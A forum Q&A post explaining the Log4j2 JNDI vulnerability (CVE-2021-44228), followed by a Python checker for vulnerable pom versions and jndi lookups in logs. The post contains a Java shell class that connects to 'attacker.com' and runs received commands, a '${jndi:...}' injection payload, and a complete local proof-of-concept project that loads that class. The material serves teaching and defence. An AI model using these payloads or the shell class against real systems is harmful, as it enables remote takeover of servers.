Stack Ask

monkey (Enlightened)
Asked: December 13, 2021, in: Java

Understanding the Apache Log4j2 vulnerability (CVE-2021-44228)


To understand it properly we first need to understand log4j a little. Log4j uses the chain of responsibility design pattern, so inside it there are Appenders. When a log statement like logger.info("Hello: {}", param) runs, that log record passes through all the appenders, each doing its own job, for example printing to the screen or writing to a file, and among them there is a class named RoutingAppender. This class calls the function StrSubstitutor.resolveVariable. That function goes and fetches the value of the variable and, painfully, it calls back into the Interpolator class.

The Interpolator class searches through many protocols, among them the JNDI protocol, to obtain the value of the variable, and boom. The attacker creates a class like this:

import java.net.Socket;
import java.util.Scanner;

public class Log4jShell {
    // The static initializer runs as soon as the JNDI lookup loads this class
    static {
        try {
            Socket socket = new Socket("attacker.com", 1234);
            Scanner scanner = new Scanner(socket.getInputStream());
            while(true) {
                String command = scanner.nextLine();
                ProcessBuilder pb = new ProcessBuilder(command);
                pb.start();
            }
        } catch (Exception e) {}
    }
}

Then he sends it to the server through the name parameter, like this: https://web_site_cua_chung_ta/hello?name=${jndi://web_site_cua_ke_tan_cong.com/Log4jShell.class}, in combination with the logger statement above. The Interpolator class resolves the value of the variable by fetching Log4jShell.class, and that is it: the attacker has a fully working terminal on our server and can do whatever he wants.

The downside of this vulnerability is that it has thrown the whole world into chaos. Every product using 2.0 <= log4j-core <= 2.14.1 has to be re-released.

The upside is that it also shows just how popular and widely used Java is. So feel free to choose Java as the backend programming language for yourself and for your organization.

Further reading if you need it: https://www.lunasec.io/docs/blog/log4j-zero-day/#how-you-can-prevent-future-attacks

Tags: log4j-core, security

3 Answers

  1. monkey (Enlightened) added an answer on December 14, 2021 at 10:18 am (this answer was edited)

    Demo without going through LDAP:

    package com.example.log4jshell;
    
    import javax.naming.Context;
    
    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;
    
    import com.tvd12.ezyhttp.core.boot.EzyHttpApplicationBootstrap;
    
    public final class Log4jShellStartup {
    
        private static final Logger LOGGER = LogManager.getLogger(Log4jShellStartup.class);
    
        public static void main(String[] args) throws Exception {
            LOGGER.info("start Log4jShell");
            System.setProperty(Context.INITIAL_CONTEXT_FACTORY, "com.example.log4jshell.AppContextFactory");
            System.setProperty(Context.PROVIDER_URL, "remote+http://localhost:8080");
            EzyHttpApplicationBootstrap.start(Log4jShellStartup.class);
        }
    }
    
    package com.example.log4jshell;
    
    import java.util.Hashtable;
    
    import javax.naming.Context;
    import javax.naming.NamingException;
    import javax.naming.spi.InitialContextFactory;
    
    public class AppContextFactory implements InitialContextFactory {
    
        private final AppInitialContext context = new AppInitialContext();
    
        public AppContextFactory() throws NamingException {}
    
        @Override
        public Context getInitialContext(Hashtable environment) throws NamingException {
            return context;
        }
    }
    
    package com.example.log4jshell;
    
    import java.io.File;
    import java.util.Hashtable;
    
    import javax.naming.NamingException;
    import javax.naming.ldap.InitialLdapContext;
    
    import com.tvd12.ezyhttp.client.HttpClient;
    
    public class AppInitialContext extends InitialLdapContext {
    
        private final HttpClient httpClient;
    
        public AppInitialContext() throws NamingException {
            httpClient = HttpClient.builder().build();
        }
        @Override
        protected void init(Hashtable environment) throws NamingException { }
    
        @Override
        public Object lookup(String name) throws NamingException {
            try {
                httpClient.download(name, new File("target/classes"));
                Thread.sleep(300);
                Class clazz = Class.forName("Log4jShell");
                return clazz.newInstance();
            } catch (Exception e) {
                e.printStackTrace();
            }
            return null;
        }
    }
    
    package com.example.log4jshell.controller;
    
    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;
    
    import com.tvd12.ezyhttp.server.core.annotation.Controller;
    import com.tvd12.ezyhttp.server.core.annotation.DoGet;
    import com.tvd12.ezyhttp.server.core.annotation.RequestParam;
    
    @Controller
    public class HomeController {
    
        private final Logger logger = LogManager.getLogger(getClass());
    
        @DoGet("/hello")
        public String hello(@RequestParam String name) {
            logger.info("Hello: {}", name);
            return "Hello " + name;
        }
    }
    
  2. monkey (Enlightened) added an answer on December 14, 2021 at 10:29 am (this answer was edited)

    Demo without going through LDAP (continued):

    import java.net.Socket;
    import java.util.Scanner;
    
    public class Log4jShell {
        static {
            try {
                System.out.println("Shell started");
                Socket socket = new Socket("localhost", 3006);
                Scanner scanner = new Scanner(socket.getInputStream());
                while(true) {
                    String command = scanner.nextLine();
                    ProcessBuilder pb = new ProcessBuilder(command);
                    pb.start();
                }
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
    

    Run the command javac Log4jShell.java to produce the file Log4jShell.class

  3. monkey (Enlightened) added an answer on December 14, 2021 at 11:06 am

    Demo without going through LDAP (continued):

    The project directory structure will look like this:

    File application.properties:

    resources.enable=true
    

    File log4j2.xml:

    <?xml version="1.0" encoding="UTF-8"?>
    <Configuration status="INFO">
      <Appenders>
        <Console name="LogToConsole" target="SYSTEM_OUT">
          <PatternLayout pattern="%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"/>
        </Console>
      </Appenders>
      <Loggers>
        <Logger name="com.example" level="debug" additivity="false">
          <AppenderRef ref="LogToConsole"/>
        </Logger>
        <Root level="info">
          <AppenderRef ref="LogToConsole"/>
        </Root>
      </Loggers>
    </Configuration>
    

    File pom.xml:

    <?xml version="1.0" encoding="UTF-8"?>
    <project xmlns="http://maven.apache.org/POM/4.0.0"
             xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
             xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
      <parent>
        <groupId>com.tvd12</groupId>
        <artifactId>ezyfox</artifactId>
        <version>1.0.2</version>
      </parent>
      <modelVersion>4.0.0</modelVersion>
      <artifactId>log4jshell</artifactId>
    
      <properties>
        <log4j2.version>2.11.2</log4j2.version>
        <ezy.http.version>0.2.0</ezy.http.version>
      </properties>
    
      <dependencies>
        <dependency>
          <groupId>com.tvd12</groupId>
          <artifactId>ezyhttp-server-boot</artifactId>
          <version>${ezy.http.version}</version>
        </dependency>
        <dependency>
          <groupId>com.tvd12</groupId>
          <artifactId>ezyhttp-client</artifactId>
          <version>${ezy.http.version}</version>
        </dependency>
        <dependency>
          <groupId>org.apache.logging.log4j</groupId>
          <artifactId>log4j-api</artifactId>
          <version>${log4j2.version}</version>
        </dependency>
        <dependency>
          <groupId>org.apache.logging.log4j</groupId>
          <artifactId>log4j-core</artifactId>
          <version>${log4j2.version}</version>
        </dependency>
      </dependencies>
    </project>
    
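The checks below are an added example written for this page; they are not code from the post, from Log4j, or from the ezyfox project, and they are in Python rather than the Java the demo uses so that they run without a build. The first check reads the log4j-core version out of a pom.xml like the one in answer 3 (resolving the `${log4j2.version}` property reference) and tests it against the affected range the question states, 2.0 <= log4j-core <= 2.14.1; later advisories widened that range, so a pass here is necessary but not sufficient, and upgrading log4j-core remains the fix. The second check scans request parameters or access-log lines, such as the `name` value that HomeController logs, for `${...}` lookup expressions whose lookup key is `jndi`, the form of the payload shown in the question; flagging an expression whose key is itself produced by a nested lookup is this example's own conservative choice. The pom and the log lines are constructed sample input.

```python
"""Added example, not code from the original post or the ezyfox project."""
import re
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

# Affected range exactly as the question states it: 2.0 <= log4j-core <= 2.14.1
AFFECTED_MIN = (2, 0, 0)
AFFECTED_MAX = (2, 14, 1)
POM_NS = {"m": "http://maven.apache.org/POM/4.0.0"}


def parse_version(version: str) -> Tuple[int, ...]:
    """'2.11.2' -> (2, 11, 2); '2.14' -> (2, 14, 0)."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def is_vulnerable_log4j_core(version: str) -> bool:
    """True when the version lies inside the range the post lists as affected."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def log4j_core_version_from_pom(pom_xml: str) -> Optional[str]:
    """Version of the log4j-core dependency, with a ${property} reference resolved."""
    root = ET.fromstring(pom_xml)
    props = {}
    props_el = root.find("m:properties", POM_NS)
    if props_el is not None:
        for child in props_el:  # strip the namespace from each property tag
            props[child.tag.split("}")[-1]] = (child.text or "").strip()
    for dep in root.findall("m:dependencies/m:dependency", POM_NS):
        gid = dep.findtext("m:groupId", default="", namespaces=POM_NS)
        aid = dep.findtext("m:artifactId", default="", namespaces=POM_NS)
        if gid == "org.apache.logging.log4j" and aid == "log4j-core":
            ver = dep.findtext("m:version", default="", namespaces=POM_NS).strip()
            ref = re.fullmatch(r"\$\{(.+)\}", ver)
            return props.get(ref.group(1)) if ref else (ver or None)
    return None


def _matching_close(text: str, start: int) -> int:
    """Index of the '}' that closes the '${' at start, or -1 if unterminated."""
    depth, j = 0, start
    while j < len(text):
        if text.startswith("${", j):
            depth += 1
            j += 2
            continue
        if text[j] == "}":
            depth -= 1
            if depth == 0:
                return j
        j += 1
    return -1


def lookup_key(expr: str) -> str:
    """The part of '${key:...}' before the first ':' at nesting depth 0."""
    inner, depth = expr[2:-1], 0
    for i, ch in enumerate(inner):
        if inner.startswith("${", i):
            depth += 1
        elif ch == "}":
            depth -= 1
        elif ch == ":" and depth == 0:
            return inner[:i]
    return inner


def classify_lookup(expr: str) -> Optional[str]:
    """Reason an expression is suspicious, or None for ordinary lookups like ${date:...}."""
    key = lookup_key(expr)
    if "${" in key:
        return "dynamic lookup key"  # key is built by another lookup (this example's choice)
    if key.strip().lower() == "jndi":
        return "jndi lookup"
    return None


def find_suspicious_lookups(text: str) -> List[Tuple[str, str]]:
    """Every complete top-level ${...} expression in text that classify_lookup flags."""
    hits, i = [], 0
    while (start := text.find("${", i)) >= 0:
        end = _matching_close(text, start)
        if end < 0:  # unterminated expression: Log4j would not expand it either
            break
        expr = text[start:end + 1]
        reason = classify_lookup(expr)
        if reason:
            hits.append((expr, reason))
        i = end + 1
    return hits


def scan_log_lines(lines: List[str]) -> List[Tuple[int, str, str]]:
    """(line number, expression, reason) for each flagged expression."""
    return [(n, e, r) for n, line in enumerate(lines, 1)
            for e, r in find_suspicious_lookups(line)]


# Constructed sample input: a trimmed pom in the shape of answer 3, and access-log
# lines for the /hello endpoint with the name parameter values described in the post.
SAMPLE_POM = """<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <artifactId>log4jshell</artifactId>
  <properties><log4j2.version>2.11.2</log4j2.version></properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>${log4j2.version}</version>
    </dependency>
  </dependencies>
</project>
"""
SAMPLE_LOG_LINES = [
    "GET /hello?name=alice 200",
    "GET /hello?name=${jndi://web_site_cua_ke_tan_cong.com/Log4jShell.class} 200",
    "GET /hello?name=${${env:FOO}:x} 200",
    "GET /hello?name=${date:yyyy} 200",
]

if __name__ == "__main__":
    version = log4j_core_version_from_pom(SAMPLE_POM)
    print(f"log4j-core {version}: vulnerable={is_vulnerable_log4j_core(version or '')}")
    for n, expr, reason in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {n}: {reason}: {expr}")
```

Run it as a script to see the pom verdict and the two flagged log lines; `${date:yyyy}` and a plain name pass untouched. The scanner walks `${`/`}` pairs instead of using a single regex so that nested expressions are treated as one unit, which is what decides whether the key is `jndi` or is being assembled at runtime.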

© 2021 Stack Ask. All Rights Reserved
Powered by youngmonkeys.org